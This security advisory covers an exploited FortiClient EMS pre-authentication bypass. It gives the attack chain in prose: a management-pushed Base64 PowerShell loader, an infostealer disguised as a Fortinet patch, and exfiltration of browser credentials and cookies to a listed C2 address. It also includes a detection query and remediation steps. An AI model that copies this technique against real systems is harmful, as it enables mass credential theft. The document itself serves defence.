FortiClient EMS CVE-2026-35616 (CVSS 9.1) Exploited

Fortinet FortiClient Endpoint Management Server (EMS) is affected by CVE-2026-35616, a critical pre-authentication API access bypass vulnerability leading to privilege escalation, carrying a CVSS score of 9.1. This vulnerability allows unauthorized attackers to gain elevated privileges on the EMS server without prior authentication. The flaw enables threat actors to manipulate critical management functions within the FortiClient EMS environment.

Recent intelligence indicates this vulnerability is actively exploited. Attackers use CVE-2026-35616 to deploy credential-stealing malware across managed endpoints. Attacks observed in May 2026 show attackers abusing the trusted endpoint management infrastructure to deliver malicious payloads disguised as legitimate Fortinet updates.

The primary objective of these campaigns is information theft, specifically targeting sensitive user data such as browser-saved credentials, session cookies, and autofill information. Exploiting this vulnerability bypasses initial authentication, giving attackers control over the FortiClient EMS server and, subsequently, its managed endpoints.

Impact

Exploiting CVE-2026-35616 gives an attacker complete control over FortiClient EMS and its managed endpoints, which leads directly to data exfiltration. Successful exploitation of this pre-authentication API access bypass (CVSS score: 9.1) allows attackers to modify EMS management configurations in a privileged context. This capability is then used to push malicious scripts for execution across all managed endpoints connected to the compromised EMS server. The core malicious payload observed is a previously unreported Windows information stealer, identified as FortiEndpoint_Patch.exe, which masquerades as a Fortinet update.

This information stealer harvests sensitive data from Chromium- and Gecko-based web browsers. Data targeted includes user passwords, session cookies, and autofill details such as credit card information, physical addresses, and phone numbers. The exfiltration of session cookies is a significant risk, as these can provide attackers with follow-on access to many cloud services, internal applications, and other authenticated resources. When session reuse is possible, these stolen session cookies may allow attackers to circumvent multi-factor authentication (MFA) prompts, giving them unauthorized, persistent access without needing actual credentials.

Because attackers abuse the FortiClient EMS's trust and management pathways, every endpoint managed by the compromised server becomes a potential execution target for the malicious payload. This removes the need for separate intrusion paths for each device, greatly expanding attack reach and efficiency. The compromised environment effectively turns the organization's own endpoint management solution into a distribution mechanism for malware, making it challenging for security teams to differentiate between legitimate and malicious operations. This broad compromise risk shows the importance of addressing CVE-2026-35616 immediately.

Exploitation Chain

CVE-2026-35616 exploitation begins with a critical pre-authentication API access bypass vulnerability that gives attackers privilege escalation on the FortiClient EMS server. This allows attackers to interact with EMS functionality in a privileged context without needing to authenticate first. This initial access allows manipulation of EMS's configuration and distribution of malicious payloads to managed endpoints. Our prior analysis of Fortinet authentication bypass flaws details how such vulnerabilities can provide initial access and control.

After compromising the FortiClient EMS server, attackers take these steps to prepare for malware delivery and maintain covert operations:

  • Configuration Modification: Attackers modify EMS configurations. This includes deferring firmware upgrade reminders, likely to prevent legitimate updates from interfering or raising suspicion.
  • Remote Access Profile Manipulation: A Remote Access Profile configuration is altered. This modification is critical, as it inserts a malicious script for execution on endpoint devices, using EMS's legitimate management pathway to push attacker-controlled code.
  • Endpoint Policy Injection: Attackers further modify an endpoint policy to embed the malicious script, ensuring its widespread distribution and execution across all managed endpoints. This step effectively uses the trusted EMS system to propagate the threat, making it appear as a standard management task.

Malware execution on endpoints then follows a specific, multi-stage process:

  1. Legitimate Executable Abuse: The attack uses fortitray.exe, a FortiClient executable, to launch a .cmd script file. This technique blends malicious activity with normal system processes, making detection more challenging.
  2. PowerShell Invocation: The .cmd script invokes a Base64-encoded PowerShell script. Base64 encoding obfuscates malicious commands and evades simple signature-based detection.
  3. Payload Delivery: The PowerShell script downloads the primary malicious payload. This payload, named FortiEndpoint_Patch.exe, is disguised as a Fortinet endpoint update, exploiting user trust in official patches.
  4. Malware Execution and Data Harvesting: FortiEndpoint_Patch.exe executes as a Windows information stealer. This malware does not have its own network-based exfiltration capabilities. Instead, it harvests sensitive data like passwords, cookies, and autofill details from Chromium- and Gecko-based browsers. The collected data is written to a log file in the ProgramData directory on the compromised endpoint.
  5. Data Exfiltration: The same PowerShell script that delivered the payload then transmits the captured data. It exfiltrates the log file's contents to an attacker-controlled infrastructure via an HTTP POST request. The observed attacker C2 server is 83.138.53[.]110.

This execution pattern shows a sophisticated understanding of FortiClient EMS's operational mechanisms, allowing attackers to push malicious PowerShell commands that closely mimic legitimate management operations. This increases the attack's stealth and its ability to propagate across an organization's network. For more details on this vulnerability and its impact on Fortinet EMS, refer to our full analysis on CVE-2026-35616 and Fortinet EMS.

Affected products and versions

The vulnerability CVE-2026-35616 impacts specific versions of Fortinet FortiClient Endpoint Management Server (EMS).

  • FortiClient Endpoint Management Server (EMS): All versions prior to 7.4.7.

Organizations running FortiClient EMS versions earlier than 7.4.7 should consider their installations vulnerable and potentially compromised, given the active exploitation.

Detection

Detecting exploitation of CVE-2026-35616 requires a multi-layered approach focusing on network, endpoint, and server-side indicators. Since the attack uses legitimate management pathways, anomalies in system behavior and process execution are crucial indicators.

Network Indicators:

  • Outbound Connections to C2: Monitor all outbound network traffic from FortiClient EMS servers and managed endpoints for connections to 83.138.53[.]110. Specifically, look for HTTP POST requests from these devices, which indicate data exfiltration.
  • Unusual EMS Traffic Patterns: Establish a baseline for normal FortiClient EMS network communication. Deviations like unexpected spikes in outbound data or connections to unusual external IP addresses require investigation.
  • Encrypted Traffic Anomalies: While the observed exfiltration uses HTTP POST, attackers may pivot to encrypted channels. Monitor for unusual SSL/TLS certificate usage or connections to newly observed domains from EMS and managed endpoints.

Endpoint Indicators (EDR/SIEM Queries):

  • Process Creation Chains:
  • Look for fortitray.exe (a FortiClient component) spawning cmd.exe.
  • Then, investigate cmd.exe launching powershell.exe, especially with Base64-encoded arguments.
  • Sample EDR query (pseudo-code): Process.parent.name == "fortitray.exe" AND Process.name == "cmd.exe" followed by Process.parent.name == "cmd.exe" AND Process.name == "powershell.exe" AND Process.command_line CONTAINS "EncodedCommand"
  • Malicious Payload Presence:
  • Search for files named FortiEndpoint_Patch.exe or similar suspicious executables in unexpected directories, especially in user profiles or the ProgramData directory.
  • Monitor for the creation of new executable files that mimic legitimate Fortinet update names.
  • PowerShell Script Execution:
  • Detect PowerShell execution with EncodedCommand parameters. Decode and analyze commands for suspicious activities like downloading files from external URLs, modifying system configurations, or initiating network connections.
  • Look for PowerShell scripts creating log files in the ProgramData directory, particularly those containing sensitive data patterns (e.g., "password", "cookie").
  • File System Changes:
  • Monitor for creation or modification of files within the ProgramData directory that appear to be temporary log files, especially those containing harvested credentials or browser data.
  • Look for suspicious .cmd script creations or modifications, particularly in directories associated with FortiClient or system startup.
  • Registry and Configuration Changes:
  • Monitor for modifications to FortiClient EMS configurations related to firmware upgrade reminders, Remote Access Profiles, or endpoint policies. These changes indicate post-exploitation activity on the EMS server.
  • Detect unusual changes to FortiClient agent settings on managed endpoints that might allow for silent script execution or data collection.

Server-Side (FortiClient EMS) Indicators:

  • API Access Anomalies: Review FortiClient EMS server logs for unauthorized or unexpected API access attempts, especially those without prior authentication. Look for successful API calls from untrusted sources that modify configuration settings related to endpoint policies or remote access profiles.
  • Administrative Account Usage: Monitor for unusual activity by administrative accounts on the EMS server, especially if it coincides with configuration changes that enable script injection.
  • Log Integrity: Verify FortiClient EMS log integrity to ensure they have not been tampered with or cleared by an attacker.

Organizations should integrate threat intelligence on known malware artifacts and C2 infrastructure into their detection systems to increase the likelihood of identifying these attacks.

Remediation

Because CVE-2026-35616 is actively exploited, immediate and complete remediation steps are critical to mitigate risk and restore environment integrity.

  • Patching: The most urgent remediation is to upgrade all FortiClient Endpoint Management Server (EMS) installations to version 7.4.7 or later. Fortinet released patches for this pre-authentication API access bypass vulnerability. This update resolves the root cause of unauthorized access and privilege escalation.
  • Compromise Assessment: Because CVE-2026-35616 is actively exploited, a thorough compromise assessment is mandatory for all environments running FortiClient EMS versions prior to 7.4.7. This assessment should include:
  • Review FortiClient EMS server logs for unauthorized configuration changes, API access anomalies, and unusual administrative activity.
  • Scan all managed endpoints for FortiEndpoint_Patch.exe (or similar suspicious executables) and related malicious files in the ProgramData directory.
  • Analyze endpoint logs for the process execution chain involving fortitray.exe spawning cmd.exe and then Base64-encoded powershell.exe commands.
  • Inspect network traffic logs for connections to the identified attacker C2 83.138.53[.]110 or other suspicious external IPs.
  • Credential Rotation: If a compromise is suspected or confirmed, or if EMS was unpatched for an extended period, mandate a password reset for all users. Prioritize users with access to critical cloud services, internal applications, and sensitive authenticated resources, as their browser-saved credentials and session cookies may have been exfiltrated.
  • MFA and Session Management Review: Re-evaluate multi-factor authentication (MFA) policy strength and enforcement across all critical systems. Since stolen session cookies can bypass MFA, consider implementing stricter session validity durations and re-authentication requirements for high-privilege access.
  • Endpoint Clean-up and Re-imaging: For endpoints confirmed to have executed the malicious payload, perform thorough clean-up, which may include re-imaging affected devices to ensure complete removal of the infostealer and any persistence mechanisms.
  • Enhanced Monitoring: Implement enhanced monitoring for the detection indicators outlined above. This includes continuous monitoring of EMS server logs, endpoint process execution, file system changes, and network traffic for suspicious activities even after patching.
  • Review and Harden EMS Configuration: Review FortiClient EMS configuration best practices, including network segmentation of the EMS server, restricting management interface access, and ensuring all EMS-related services run with the principle of least privilege.

Prompt action on these remediation steps will reduce the window of opportunity for attackers and limit the impact of this critical vulnerability.

Technical Takeaways

  • CVE-2026-35616 is a critical pre-authentication API access bypass vulnerability in FortiClient EMS, rated with a CVSS score of 9.1. It allows for privilege escalation.
  • The vulnerability is actively exploited, allowing attackers to gain unauthorized, privileged access to FortiClient EMS servers.
  • Exploitation involves modifying EMS configurations and policies to use its legitimate management pathways for distributing malicious Base64-encoded PowerShell scripts to managed endpoints.
  • The primary payload is a Windows information stealer (FortiEndpoint_Patch.exe) disguised as a Fortinet update. It harvests browser-saved credentials, session cookies, and autofill data from Chromium- and Gecko-based browsers.
  • Stolen session cookies can provide follow-on access to cloud services and internal applications, potentially circumventing multi-factor authentication (MFA).
  • Patching FortiClient EMS to version 7.4.7 or later is the immediate remediation. However, a complete compromise assessment and credential rotation are crucial due to active exploitation.